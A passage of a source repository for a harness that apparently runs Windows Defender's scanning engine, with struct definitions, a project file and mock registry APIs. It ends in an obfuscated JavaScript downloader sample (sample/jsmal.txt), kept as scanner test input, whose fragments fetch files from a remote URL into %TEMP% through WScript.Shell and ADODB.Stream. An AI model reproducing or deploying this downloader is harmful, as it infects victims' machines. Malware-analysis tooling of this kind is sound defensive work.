STREAM_ATTRIBUTE_FILE_ATTRIBUTES = 55, 61 | STREAM_ATTRIBUTE_HAS_MOTW_ADS = 56, 62 | STREAM_ATTRIBUTE_SE_SIGNING_LEVEL = 57, 63 | STREAM_ATTRIBUTE_SESSION_ID = 58, 64 | STREAM_ATTRIBUTE_AMSI_APP_ID = 59, 65 | STREAM_ATTRIBUTE_AMSI_SESSION_ID = 60, 66 | STREAM_ATTRIBUTE_FILE_OPERATION_PPID = 61, 67 | STREAM_ATTRIBUTE_SECTOR_NUMBER = 62, 68 | STREAM_ATTRIBUTE_AMSI_CONTENT_NAME = 63, 69 | STREAM_ATTRIBUTE_AMSI_UAC_REQUEST_CONTEXT = 64, 70 | STREAM_ATTRIBUTE_RESOURCE_CONTEXT = 65, 71 | STREAM_ATTRIBUTE_OPEN_CREATEPROCESS_HINT = 66, 72 | STREAM_ATTRIBUTE_GENSTREAM_APP_NAME = 67, 73 | STREAM_ATTRIBUTE_GENSTREAM_SESSION_ID = 68, 74 | STREAM_ATTRIBUTE_GENSTREAM_CONTENT_NAME = 69, 75 | STREAM_ATTRIBUTE_OPEN_ACCESS_STATE_FLAGS = 70, 76 | STREAM_ATTRIBUTE_GENSTREAM_EXTERN_GUID = 71, 77 | STREAM_ATTRIBUTE_IS_CONTAINER_FILE = 72, 78 | STREAM_ATTRIBUTE_AMSI_REDIRECT_CHAIN = 75, 79 | }; 80 | 81 | enum { 82 | SCANREASON_UNKNOWN = 0, 83 | SCANREASON_ONMOUNT = 1, 84 | SCANREASON_ONOPEN = 2, 85 | SCANREASON_ONFIRSTREAD = 3, 86 | SCANREASON_ONWRITE = 4, 87 | SCANREASON_ONMODIFIEDHANDLECLOSE = 5, 88 | SCANREASON_INMEMORY = 8, 89 | SCANREASON_VALIDATION_PRESCAN = 9, 90 | SCANREASON_VALIDATION_CONTENTSCAN = 0x0A, 91 | SCANREASON_ONVOLUMECLEANUP = 0x0B, 92 | SCANREASON_AMSI = 0x0C, 93 | SCANREASON_AMSI_UAC = 0x0D, 94 | SCANREASON_GENERICSTREAM = 0x0E, 95 | SCANREASON_IOAVSTREAM = 0x0F, 96 | }; 97 | 98 | #ifdef _X86 99 | typedef struct _USERDEFINED_STREAMBUFFER_DESCRIPTOR { // size of StreamBufferDescriptor is 0x80 100 | uint32_t UserPtr; 101 | uint32_t(*Read)(uint32_t fd, unsigned long long Offset, void* Buffer, uint32_t Size, uint32_t* SizeRead); 102 | uint32_t(*Write)(uint32_t fd, uint32_t Offset, void* Buffer, uint32_t Size, uint32_t* TotalWritten); 103 | uint32_t(*GetSize)(uint32_t fd, uint32_t *FileSize); 104 | uint32_t(*SetSize)(uint32_t fd, uint32_t *FileSize); 105 | char16_t __stdcall *(*GetName)(void* streambuffer_disc); 106 | uint32_t(*SetAttributes)(uint32_t fd, uint32_t Attribute, void* Data, uint32_t DataSize); 107 | uint32_t(*GetAttributes)(uint32_t fd, uint32_t Attribute, void* Data, uint32_t DataSize, uint32_t* DataSizeWritten); 108 | } StreamBufferDescriptor, *PStreamBufferDescriptor; 109 | #elif _X64 110 | typedef struct _USERDEFINED_STREAMBUFFER_DESCRIPTOR { // size of StreamBufferDescriptor is 0x80 111 | uint64_t UserPtr; 112 | uint64_t __stdcall (*Read)(uint64_t fd, uint64_t Offset, void* Buffer, uint64_t Size, uint64_t* SizeRead); 113 | uint64_t __stdcall (*Write)(uint64_t fd, uint64_t Offset, void* Buffer, uint64_t Size, uint64_t* TotalWritten); 114 | uint64_t __stdcall (*GetSize)(uint64_t fd, uint64_t *FileSize); 115 | uint64_t __stdcall (*SetSize)(uint64_t fd, uint64_t *FileSize); 116 | char16_t __stdcall *(*GetName)(void* streambuffer_disc); 117 | uint64_t(*SetAttributes)(uint64_t fd, uint64_t Attribute, void* Data, uint64_t DataSize); 118 | uint64_t(*GetAttributes)(uint64_t fd, uint64_t Attribute, void* Data, uint64_t DataSize, uint64_t* DataSizeWritten); 119 | } StreamBufferDescriptor, *PStreamBufferDescriptor; 120 | #endif // _X86 121 | 122 | #ifdef _X86 123 | typedef struct _StreamBufferScanData { 124 | PStreamBufferDescriptor Descriptor; 125 | PCCftScanState ScanState; 126 | uint32_t UnknownB; 127 | void* UfsClientRequest; // New Created durring running 128 | } StreamBufferScanData, *PStreamBufferScanData; 129 | #elif _X64 130 | typedef struct _StreamBufferScanData { 131 | PStreamBufferDescriptor Descriptor; 132 | PCCftScanState ScanState; 133 | uint64_t UnknownB; 134 | void* UfsClientRequest; // New Created durring running 135 | } StreamBufferScanData, *PStreamBufferScanData; 136 | #endif // _X86 137 | 138 | #ifdef _X86 139 | typedef struct _STREAMBUFFER_DESCRIPTOR_INTERNAL { 140 | void* vftable; 141 | uint32_t RESERVED; 142 | uint32_t(*VfzReadDefaultCb)(); 143 | uint32_t(*VfzWriteDefaultCb)(); 144 | uint32_t(*VfzGetSizeDefaultCb)(); 145 | uint32_t(*VfzSetSizeDefaultCb)(); 146 | PStreamBufferDescriptor* streambuffer_disc; 147 | void* ReadStream; 148 | void* WriteStream; 149 | void* GetSize; 150 | void* SetSize; 151 | void* GetName; 152 | void* SetAttributes; 153 | void* GetAttributes; 154 | uint32_t Reserved1; 155 | uint32_t Unknown1; 156 | uint32_t Reserved2; 157 | uint32_t Reserved3; 158 | uint32_t Unknown2; 159 | uint32_t Unknown3; 160 | uint32_t Unknown4; 161 | uint32_t Unknown5; 162 | uint32_t Reserved4; 163 | uint32_t Reserved5; 164 | uint32_t Reserved6; 165 | uint32_t Reserved7; 166 | uint32_t Reserved8; 167 | uint32_t Unknown6; 168 | uint32_t Unknown7; 169 | uint32_t Unknown8; 170 | uint32_t Unknown9; 171 | uint32_t Unknown10; 172 | uint32_t Unknown11; 173 | uint32_t Unknown12; 174 | uint32_t Unknown13; 175 | uint32_t Unknown14; 176 | uint32_t Reserved9; 177 | }; 178 | #elif _X64 179 | typedef struct _STREAMBUFFER_DESCRIPTOR_INTERNAL { 180 | void* vftable; 181 | uint64_t RESERVED; 182 | uint64_t(*VfzReadDefaultCb)(); 183 | uint64_t(*VfzWriteDefaultCb)(); 184 | uint64_t(*VfzGetSizeDefaultCb)(); 185 | uint64_t(*VfzSetSizeDefaultCb)(); 186 | PStreamBufferDescriptor* streambuffer_disc; 187 | void* ReadStream; 188 | void* WriteStream; 189 | void* GetSize; 190 | void* SetSize; 191 | void* GetName; 192 | void* SetAttributes; 193 | void* GetAttributes; 194 | uint64_t Reserved1; 195 | uint64_t Unknown1; 196 | uint64_t Reserved2; 197 | uint64_t Reserved3; 198 | uint64_t Unknown2; 199 | uint64_t Unknown3; 200 | uint64_t Unknown4; 201 | uint64_t Unknown5; 202 | uint64_t Reserved4; 203 | uint64_t Reserved5; 204 | uint64_t Reserved6; 205 | uint64_t Reserved7; 206 | uint64_t Reserved8; 207 | uint64_t Unknown6; 208 | uint64_t Unknown7; 209 | uint64_t Unknown8; 210 | uint64_t Unknown9; 211 | uint64_t Unknown10; 212 | uint64_t Unknown11; 213 | uint64_t Unknown12; 214 | uint64_t Unknown13; 215 | uint64_t Unknown14; 216 | uint64_t Reserved9; 217 | }STREAMBUFFER_DESCRIPTOR_INTERNAL; 218 | #endif 219 | 220 | #pragma pack(pop) 221 | #endif // __STREAMBUFFER_H 222 | -------------------------------------------------------------------------------- /of-loadlib.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {29CBD1F5-DA99-4145-AB47-49F6901066EF} 24 | ofloadlib 25 | 10.0.17763.0 26 | 27 | 28 | 29 | Application 30 | true 31 | v141 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v141 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v141 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v141 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | $(SolutionDir) 74 | $(ProjectDir);$(IncludePath) 75 | 76 | 77 | 78 | Level3 79 | Disabled 80 | true 81 | true 82 | 83 | 84 | Console 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | true 92 | false 93 | _MBCS;%(PreprocessorDefinitions);_X64;__WINDOWS__;_DEBUG_ 94 | Async 95 | 96 | 97 | Console 98 | 99 | 100 | 101 | 102 | Level3 103 | MaxSpeed 104 | true 105 | true 106 | true 107 | true 108 | 109 | 110 | Console 111 | true 112 | true 113 | 114 | 115 | 116 | 117 | Level3 118 | MaxSpeed 119 | true 120 | true 121 | true 122 | true 123 | 124 | 125 | Console 126 | true 127 | true 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | -------------------------------------------------------------------------------- /winapi/dlls/advapi32.cpp: -------------------------------------------------------------------------------- 1 | #include "advapi32.h" 2 | #include 3 | #include 4 | 5 | using namespace std; 6 | 7 | uint32_t __stdcall MockAdvapi::RegisterTraceGuidsW(void* RequestAddress, void* RequestContext, void* ControlGuid, uint32_t GuidCOunt, void* TraceGuidReg, char16_t* MofImagePath, char16_t* MofResourceName, void* RegistrationHandle) { 8 | debug_log(" called..\n", "RegisterTraceGuidsW"); 9 | 10 | return 0; 11 | } 12 | 13 | uint32_t __stdcall MockAdvapi::EventSetInformation(void* RegHandle, uint32_t InformationClass, void* EventInformation, uint32_t InformationLength) { 14 | debug_log(" called..\n", "EventSetInformation"); 15 | 16 | return 0; 17 | } 18 | 19 | bool __stdcall MockAdvapi::LookupPrivilegeValueA(char* lpSystemName, char* lpName, void* lpLuid) { 20 | debug_log(" called with %s:%s\n", "LookupPrivilegeValueA", lpSystemName, lpName); 21 | 22 | if (lpSystemName != NULL) 23 | return false; 24 | char* prv1 = "SeDebugPrivilege"; 25 | char* prv2 = "SeBackupPrivilege"; 26 | char* prv3 = "SeRestorePrivilege"; 27 | if (strcmp(prv1, lpName) == 0 || strcmp(prv2, lpName) == 0 || strcmp(prv3, lpName) == 0) { 28 | return false; 29 | } 30 | return true; 31 | } 32 | 33 | bool __stdcall MockAdvapi::LookupPrivilegeValueW(char16_t* lpSystemName, char16_t* lpName, void* lpLuid) { 34 | char* system_name = nullptr; 35 | char* name = nullptr; 36 | if (!lpName) 37 | return false; 38 | if(lpSystemName) 39 | system_name = convert_wstr_to_str(lpSystemName); 40 | 41 | name = convert_wstr_to_str(lpName); 42 | 43 | bool ret = LookupPrivilegeValueA(system_name, name, lpLuid); 44 | delete name; 45 | delete system_name; 46 | return ret; 47 | } 48 | 49 | bool __stdcall MockAdvapi::AdjustTokenPrivileges(void* TokenHandle, bool DisableAllPrivileges, void* NewState, uint32_t BufferLength, void* PreviousState, uint32_t* ReturnLength) { 50 | debug_log(" called..\n", "AdjustTokenPrivileges"); 51 | return true; 52 | } 53 | 54 | long __stdcall MockAdvapi::RegCreateKeyExW( 55 | /* 56 | Creates the specified registry key. 57 | If the key already exists, the function opens it. 58 | Note that key names are not case sensitive. 59 | */ 60 | void* hKey, 61 | char16_t* lpSubKey, 62 | uint32_t Reserved, 63 | void* lpClass, 64 | uint32_t dwOptions, 65 | void* samDesired, 66 | void* lpSecurityAttributes, 67 | void* phkResult, 68 | uint32_t* lpdwDisposition) { 69 | u16string wstr = u16string(lpSubKey); 70 | string hive; 71 | string sub_key_str; 72 | string key_str; 73 | Json::Value key; 74 | uintptr_t HKEY = (uintptr_t)hKey; 75 | HKEY = HKEY & 0x00000000ffffffff; 76 | 77 | sub_key_str.assign(wstr.begin(), wstr.end()); 78 | switch (HKEY) 79 | { 80 | case HKEY_LOCAL_MACHINE: 81 | hive = "hklm"; 82 | key = MockNTKrnl::mock_reg[hive]; 83 | break; 84 | case HKEY_CLASSES_ROOT: 85 | case HKEY_CURRENT_CONFIG: 86 | case HKEY_CURRENT_USER: 87 | case HKEY_USERS: 88 | hive = "not imp"; 89 | break; 90 | default: 91 | tie(hive, key_str, key) = MockNTKrnl::m_reg_handle[(uintptr_t)hKey]; 92 | break; 93 | } 94 | vector splitted = split_string((char*)sub_key_str.c_str(), '\\'); 95 | //Json::Value key = MockNTKrnl::mock_reg[hive]; 96 | if (!key) { 97 | debug_log(" called with ERROR_FILE_NOT_FOUND\n", "RegCreateKeyExW"); 98 | return ERROR_FILE_NOT_FOUND; 99 | } 100 | 101 | bool exist= true; 102 | for (auto const subk : splitted) { // check key exist 103 | string s = str_tolower((char*)subk.c_str()); 104 | key = key[s]; 105 | if (key.isObject()) 106 | continue; 107 | if (!key) { 108 | key[subk] = Json::objectValue; 109 | } 110 | } 111 | 112 | debug_log(" called with %s/%s\n", "RegCreateKeyExW", hive.c_str(), sub_key_str.c_str()); 113 | 114 | uint64_t new_k = MockNTKrnl::CreateNewRegHandle(hive, sub_key_str, key); 115 | memmove(phkResult, &new_k, sizeof(new_k)); 116 | 117 | return 0; 118 | } 119 | 120 | long __stdcall MockAdvapi::RegOpenKeyExW(void* hKey, char16_t* lpSubKey, uint32_t ulOptions, uint32_t samDesired, void** phkResult) { 121 | u16string wstr = u16string(lpSubKey); 122 | string hive; 123 | string sub_key_str; 124 | string key_str; 125 | sub_key_str.assign(wstr.begin(), wstr.end()); 126 | Json::Value key; 127 | uintptr_t HKEY = (uintptr_t)hKey; 128 | HKEY = HKEY & 0x00000000ffffffff; 129 | 130 | switch ((uint64_t)HKEY) 131 | { 132 | case HKEY_LOCAL_MACHINE: 133 | hive = "hklm"; 134 | key = MockNTKrnl::mock_reg[hive]; 135 | break; 136 | case HKEY_CLASSES_ROOT: 137 | case HKEY_CURRENT_CONFIG: 138 | case HKEY_CURRENT_USER: 139 | case HKEY_USERS: 140 | hive = "not imp"; 141 | break; 142 | default: 143 | tie(hive, key_str, key) = MockNTKrnl::m_reg_handle[HKEY]; 144 | break; 145 | } 146 | vector splitted = split_string((char*)sub_key_str.c_str(), '\\'); 147 | 148 | if (!key) { 149 | debug_log(" called with ERROR_FILE_NOT_FOUND\n", "RegOpenKeyExW"); 150 | return ERROR_FILE_NOT_FOUND; 151 | } 152 | 153 | for (auto const subk : splitted) { // check key exist 154 | string s = str_tolower((char*)subk.c_str()); 155 | key = key[s]; 156 | if (key.isObject()) 157 | continue; 158 | if (!key) { 159 | debug_log(" called with ERROR_FILE_NOT_FOUND\n", "RegOpenKeyExW"); 160 | return ERROR_FILE_NOT_FOUND; 161 | } 162 | } 163 | debug_log(" called with %s>%s\n", "RegOpenKeyExW", hive.c_str(), sub_key_str.c_str()); 164 | uint64_t new_k = MockNTKrnl::CreateNewRegHandle(hive, sub_key_str, key); 165 | memmove(phkResult, &new_k, sizeof(new_k)); 166 | 167 | return 0; 168 | } 169 | 170 | long __stdcall MockAdvapi::RegQueryInfoKeyW( 171 | void* hKey, 172 | char16_t* lpClass, 173 | uint32_t* lpcClass, 174 | uint32_t* lpReserved, 175 | uint32_t* lpcSubKeys, 176 | uint32_t* lpcMaxSubKeyLen, 177 | uint32_t* lpcMaxClassLen, 178 | uint32_t* lpcValues, 179 | uint32_t* lpcMaxValueNameLen, 180 | uint32_t* lpcMaxValueLen, 181 | uint32_t* lpcbSecurityDescriptor, 182 | void* lpftLastWriteTime 183 | ) { 184 | debug_log(" called..\n", "RegQueryInfoKeyW"); 185 | 186 | string hive; 187 | string key_str; 188 | Json::Value key; 189 | tie(hive, key_str, key) = MockNTKrnl::m_reg_handle[(uintptr_t)hKey]; 190 | uint32_t subkeys = 0; 191 | uint32_t key_values = 0; 192 | uint32_t max_valuename_len = 0; 193 | uint32_t max_subkey_len = 0; 194 | for (auto it = key.begin(); it != key.end(); ++it) 195 | { 196 | string subkey_str = it.key().asString(); 197 | size_t subkey_str_len = subkey_str.length(); 198 | if (key[it.key().asString()].isObject()){ 199 | if (subkey_str_len > max_subkey_len) 200 | max_subkey_len = subkey_str_len; 201 | subkeys++; 202 | } 203 | else { 204 | if (subkey_str_len > max_valuename_len) 205 | max_valuename_len = subkey_str_len; 206 | key_values++; 207 | } 208 | } 209 | if (lpClass) { 210 | assert(0); // not implemented yet 211 | } 212 | if (lpcClass) { 213 | assert(0); // not implemented yet 214 | } 215 | if (lpcSubKeys) { 216 | *lpcSubKeys = subkeys; 217 | } 218 | if (lpcMaxSubKeyLen) { 219 | *lpcMaxSubKeyLen = max_subkey_len; 220 | } 221 | if (lpcMaxClassLen) { 222 | assert(0); // not implemented yet 223 | } 224 | if (lpcValues) { 225 | /*number of values in key*/ 226 | *lpcValues = key_values; 227 | } 228 | 229 | if (lpcMaxValueNameLen) { 230 | *lpcMaxValueNameLen = max_valuename_len; 231 | } 232 | if (lpcMaxValueLen) { 233 | assert(0); // not implemented yet 234 | } 235 | if (lpcbSecurityDescriptor) { 236 | assert(0); // not implemented yet 237 | } 238 | 239 | return 0; 240 | } 241 | 242 | long __stdcall MockAdvapi::RegQueryValueExW(void* hKey, char16_t* lpValueName, uint32_t* lpReserved, uint32_t* lpType, uint8_t* lpData, uint32_t* lpcbData) { 243 | string hive; 244 | string key_str; 245 | Json::Value key; 246 | string value; 247 | u16string value_w = u16string(lpValueName); 248 | value.assign(value_w.begin(), value_w.end()); 249 | 250 | debug_log(" called with %s\n", "RegQueryValueExW", value.c_str()); 251 | uintptr_t HKEY = (uintptr_t)hKey; 252 | HKEY = HKEY & 0x00000000ffffffff; 253 | 254 | switch (HKEY) 255 | { 256 | case HKEY_LOCAL_MACHINE: 257 | hive = "hklm"; 258 | key = MockNTKrnl::mock_reg[hive]; 259 | break; 260 | case HKEY_CLASSES_ROOT: 261 | case HKEY_CURRENT_CONFIG: 262 | case HKEY_CURRENT_USER: 263 | case HKEY_USERS: 264 | hive = "not imp"; 265 | break; 266 | default: 267 | tie(hive, key_str, key) = MockNTKrnl::m_reg_handle[(uintptr_t)hKey]; 268 | break; 269 | } 270 | 271 | if (key.isMember(value)) { 272 | auto subkey = key[value]; 273 | uint32_t regtype; 274 | size_t data_sz = 0; 275 | 276 | if (subkey.isString()) { 277 | regtype = 0x2; //REG_EXPAND_SZ; 278 | u16string value; 279 | data_sz = subkey.asString().length(); 280 | 281 | value.assign(subkey.asString().begin(), subkey.asString().end()); 282 | if (data_sz > *lpcbData) { 283 | *lpcbData = data_sz; 284 | return 234; //ERROR_MORE_DATA 285 | } 286 | memmove(lpData, value.c_str(), (data_sz+1)*sizeof(WCHAR)); 287 | 288 | *lpcbData = (data_sz + 1) * sizeof(WCHAR); 289 | } 290 | else if (subkey.isInt64() || subkey.isInt()) { 291 | regtype = 0x4; //REG_DWORD 292 | data_sz = 4; 293 | } 294 | *lpType = regtype; 295 | 296 | } 297 | else { 298 | debug_log(" called with ERROR_FILE_NOT_FOUND\n", "RegQueryValueExW"); 299 | return ERROR_FILE_NOT_FOUND; 300 | } 301 | return 0; 302 | } 303 | 304 | long __stdcall MockAdvapi::RegEnumKeyExW(void* hKey, uint32_t dwIndex, char16_t* lpName, uint32_t* lpcchName, void* lpReserved, char16_t* lpClass, uint32_t* lpcchClass, void* lpftLastWriteTime) { 305 | string hive; 306 | string key_str; 307 | Json::Value key; 308 | tie(hive, key_str, key) = MockNTKrnl::m_reg_handle[(uintptr_t)hKey]; 309 | 310 | debug_log(" called..\n", "RegEnumKeyExW"); 311 | 312 | 313 | uint32_t idx = 0; 314 | auto it = key.begin(); 315 | for (; it != key.end(); ++it) { 316 | if (!key[it.key().asString()].isObject()) 317 | continue; 318 | if (idx == dwIndex) 319 | break; 320 | idx++; 321 | } 322 | 323 | key_str = it.key().asString(); 324 | auto subkey = key[key_str]; 325 | 326 | if (it == key.end()) { 327 | /*can't get value of target index*/ 328 | return 0x80070103; // ERROR_NO_MORE_ITEMS; 329 | } 330 | 331 | if (lpName) { 332 | copy_str_to_wstr((char*)key_str.c_str(), lpName, key_str.length()); 333 | } 334 | if (lpcchName) { 335 | *lpcchName = key_str.length(); 336 | } 337 | if (lpClass) { 338 | assert(0); // not impemented yet 339 | } 340 | if (lpcchClass) { 341 | assert(0); // not impemented yet 342 | } 343 | 344 | 345 | return 0; 346 | } 347 | 348 | 349 | long __stdcall MockAdvapi::RegCloseKey(void* hKey) { 350 | debug_log(" called..\n", "RegCloseKey"); 351 | 352 | uintptr_t k = (uintptr_t)hKey; 353 | MockNTKrnl::RemoveRegHandle(k); 354 | return 0; 355 | } 356 | 357 | long __stdcall MockAdvapi::RegNotifyChangeKeyValue(void* hKey, bool bWatchSubtree, uint32_t dwNotifyFilter, void* hEvent, bool fAsynchronous) { 358 | debug_log(" called..\n", "RegNotifyChangeKeyValue"); 359 | 360 | return 0; 361 | } 362 | 363 | uint32_t __stdcall MockAdvapi::LsaNtStatusToWinError(uint32_t Status) { 364 | debug_log(" called..\n", "LsaNtStatusToWinError"); 365 | 366 | return Status; 367 | } 368 | 369 | uint32_t __stdcall MockAdvapi::EventWriteEx( 370 | void* EventDescriptor, 371 | uint64_t Filter, 372 | uint32_t Flags, 373 | void* ActivityId, 374 | void* RelatedActivityId, 375 | uint32_t UserDataCount, 376 | void* UserData) { 377 | debug_log(" called..\n", "EventWriteEx"); 378 | 379 | return 0; 380 | } 381 | 382 | uint32_t __stdcall MockAdvapi::EventWriteTransfer( 383 | void* RegHandle, 384 | void* EventDescriptor, 385 | void* ActivityId, 386 | void* RelatedActivityId, 387 | uint32_t UserDataCount, 388 | void* UserData 389 | ) { 390 | debug_log(" called..\n", "EventWriteTransfer"); 391 | 392 | return 0; 393 | } 394 | 395 | uint32_t __stdcall MockAdvapi::MyEventActivityIdControl( 396 | uint32_t ControlCode, 397 | void* ActivityId 398 | ) { 399 | debug_log(" called..\n", "MyEventActivityIdControl"); 400 | 401 | return 0; 402 | //return 0; 403 | } 404 | -------------------------------------------------------------------------------- /sample/jsmal.txt: -------------------------------------------------------------------------------- 1 | var str="5550575E0508010724011C1405101001070C4A070B09";function l85986() { return 'ickin'; }; /* var j=l104376(); */ function l420376() { return 'ar w'; }; function l859860() { return ' dn ='; }; /* var j=l960195(); */ /* var j=l927628(); */ /* var j=l257610(); */ /* var j=l103362(); */ function l353498() { return 'b.'; }; /* var j=l923695(); */ function l1127372() { return 'if (x'; }; /* var j=l815369(); */ /* var j=l681673(); */ /* var j=l484452(); */ /* var j=l843686(); */ function l1796152() { return 'r) '; }; function l1442654() { return 'ri'; }; function l1251574() { return 'ar '; }; /* var j=l143501(); */ /* var j=l759090(); */ /* var j=l882531(); */ /* var j=l408751(); */ /* var j=l120606(); */ function l1528640() { return '(x'; }; /* var j=l382012(); */ function l1117818() { return '{ '; }; /* var j=l691695(); */ /* var j=l888419(); */ function l974508() { return 'ML2.'; }; function l248404() { return 'sstt.'; }; /* var j=l172800(); */ function l487254() { return 't('; }; function l1786598() { return 'ch (e'; }; /* var j=l191956(); */ /* var j=l431289(); */ /* var j=l742503(); */ function l1394884() { return 'a.t'; }; /* var j=l635088(); */ function l525470() { return 'ell")'; }; function l668780() { return 'ng.'; }; /* var j=l445509(); */ function l57324() { return 'ar b'; }; /* var j=l154910(); */ /* var j=l141576(); */ function l2130542() { return ' ('; }; function l334390() { return ' i=0;'; }; function l28662() { return 'on dl'; }; /* var j=l304793(); */ function l2044556() { return '"+s'; }; /* var j=l575816(); */ /* var j=l730564(); */ function l621010() { return 'rings'; }; function l458592() { return 'ctiv'; }; /* var j=l897858(); */ function l1691058() { return 'fn,2'; }; /* var j=l273185(); */ function l1958570() { return '+"/d'; }; /* var j=l237151(); */ /* var j=l113112(); */ /* var j=l178557(); */ /* var j=l115304(); */ /* var j=l356995(); */ function l984062() { return 'XM'; }; function l726104() { return ')+'; }; /* var j=l966523(); */ function l229296() { return 'et '; }; function l1356668() { return '");'; }; /* var j=l497210(); */ function l888522() { return 'var'; }; /* var j=l390459(); */ function l143310() { return '.com'; }; /* var j=l359239(); */ function l1012724() { return '); xo'; }; /* var j=l918252(); */ function l1404438() { return 'ype '; }; function l1079602() { return ' f'; }; /* var j=l755857(); */ /* var j=l849560(); */ function l1566856() { return '50'; }; function l1347114() { return 'tream'; }; function l697442() { return 'rC'; }; function l754766() { return 'ound('; }; function l831198() { return ')+".'; }; function l363052() { return 'le'; }; /* var j=l992997(); */ /* var j=l214944(); */ function l95540() { return 'son'; }; function l2006340() { return '?rnd'; }; /* var j=l690091(); */ /* var j=l515072(); */ function l1480870() { return 'pons'; }; /* var j=l412216(); */ function l783428() { return 'ran'; }; /* var j=l454054(); */ /* var j=l780557(); */ /* var j=l237435(); */ /* var j=l360438(); */ function l66878() { return ' ='; }; function l1901246() { return '("G'; }; /* var j=l509394(); */ function l1968124() { return 'ocu'; }; /* var j=l310897(); */ /* var j=l238213(); */ function l1022278() { return '.o'; }; function l1700612() { return '); t'; }; function l2082772() { return 'xo.se'; }; function l277066() { return 'it("'; }; function l47770() { return '{ v'; }; function l382160() { return 'h;'; }; function l1041386() { return 'ady'; }; /* var j=l705040(); */ function l1337560() { return 'B.S'; }; function l1509532() { return ');'; }; function l1232466() { return ' 200)'; }; /* var j=l879813(); */ /* var j=l471809(); */ function l1136926() { return 'o.rea'; }; /* var j=l102560(); */ /* var j=l320838(); */ /* var j=l435201(); */ /* var j=l210397(); */ function l2063664() { return 'al'; }; function l1996786() { return 'php'; }; /* var j=l296660(); */ /* var j=l380041(); */ function l1719720() { return ' {'; }; function l1748382() { return '(fn,'; }; function l1777044() { return '} cat'; }; /* var j=l304062(); */ /* var j=l561323(); */ function l191080() { return 'art'; }; /* var j=l389323(); */ /* var j=l745612(); */ function l315282() { return 'r ('; }; /* var j=l386697(); */ function l257958() { return 'com".'; }; /* var j=l416012(); */ /* var j=l379456(); */ function l1203804() { return 'sta'; }; function l2292960() { return '143);'; }; function l2035002() { return '"&id='; }; /* var j=l294203(); */ /* var j=l974814(); */ function l1614626() { return 'po'; }; function l324836() { return 'var'; }; function l1471316() { return 'Res'; }; /* var j=l700890(); */ /* var j=l283793(); */ /* var j=l387950(); */ /* var j=l667033(); */ function l2245190() { return '41);'; }; function l1423546() { return '; xa'; }; function l1194250() { return ' xo.'; }; /* var j=l964949(); */ /* var j=l357678(); */ function l706996() { return 'od'; }; /* var j=l731567(); */ function l601902() { return 'ronme'; }; /* var j=l898974(); */ function l1843922() { return '); '; }; function l1070048() { return 'ge ='; }; /* var j=l885282(); */ /* var j=l630061(); */ /* var j=l950549(); */ /* var j=l544875(); */ function l2073218() { return 'se); '; }; function l2187866() { return ' 1) b'; }; /* var j=l555929(); */ /* var j=l281007(); */ /* var j=l434085(); */ function l372606() { return 'ngt'; }; /* var j=l172162(); */ /* var j=l287502(); */ function l878968() { return '; '; }; /* var j=l432002(); */ /* var j=l817707(); */ function l1146480() { return 'dySt'; }; function l219742() { return '.n'; }; function l2015894() { return '="'; }; function l993616() { return 'LH'; }; function l1375776() { return 'pen'; }; function l1385330() { return '(); x'; }; /* var j=l210377(); */ function l1261128() { return 'xa ='; }; /* var j=l785483(); */ function l1585964() { return ' { dn'; }; /* var j=l279532(); */ /* var j=l259059(); */ /* var j=l976003(); */ /* var j=l811826(); */ /* var j=l128276(); */ function l1557302() { return '> '; }; function l563686() { return '= ws'; }; /* var j=l405840(); */ /* var j=l550636(); */ function l152864() { return ' s'; }; function l286620() { return ' "'; }; /* var j=l660124(); */ /* var j=l187665(); */ /* var j=l510648(); */ /* var j=l830239(); */ /* var j=l520839(); */ function l1308898() { return 'ect("'; }; function l1031832() { return 'nre'; }; function l305728() { return ' fo'; }; function l2226082() { return '; dl('; }; /* var j=l899779(); */ /* var j=l998832(); */ /* var j=l337716(); */ function l1499978() { return 'ody'; }; function l2216528() { return '; }'; }; /* var j=l805811(); */ /* var j=l426637(); */ function l735658() { return 'Math'; }; /* var j=l924784(); */ /* var j=l602434(); */ function l1175142() { return '== 4'; }; /* var j=l574621(); */ function l468146() { return 'eXO'; }; /* var j=l247202(); */ function l764320() { return 'Mat'; }; /* var j=l515212(); */ /* var j=l119438(); */ function l1891692() { return 'open'; }; function l267512() { return 'spl'; }; function l1643288() { return '= 0'; }; /* var j=l391790(); */ /* var j=l424256(); */ /* var j=l987216(); */ /* var j=l697174(); */ function l105094() { return 'wre'; }; function l1929908() { return 'p:/'; }; /* var j=l170982(); */ function l1949016() { return '+b[i]'; }; /* var j=l945704(); */ /* var j=l583919(); */ function l38216() { return '(fr) '; }; function l1624180() { return 'siti'; }; function l554132() { return 'n '; }; /* var j=l310092(); */ function l1050940() { return 'state'; }; function l659226() { return 'tri'; }; function l181526() { return 'sm'; }; function l9554() { return 'fu'; }; function l551() { return 'print'; }; /* var j=l292647(); */ /* var j=l941428(); */ function l343944() { return ' i<'; }; function l898076() { return ' xo'; }; /* var j=l157643(); */ /* var j=l441709(); */ /* var j=l465299(); */ function l449038() { return 'ew A'; }; /* var j=l537097(); */ function l1060494() { return 'chan'; }; /* var j=l185346(); */ /* var j=l721453(); */ function l592348() { return 'nvi'; }; /* var j=l954040(); */ function l640118() { return 'MP%")'; }; /* var j=l334699(); */ function l1576410() { return '00)'; }; function l200634() { return 'la'; }; function l2120988() { return 'ch'; }; function l1270682() { return ' new'; }; function l1710166() { return 'ry'; }; function l76432() { return ' "d'; }; /* var j=l863709(); */ /* var j=l610217(); */ function l1299344() { return 'Obj'; }; function l869414() { return ' 0'; }; /* var j=l769634(); */ /* var j=l456822(); */ function l687888() { return 'ha'; }; /* var 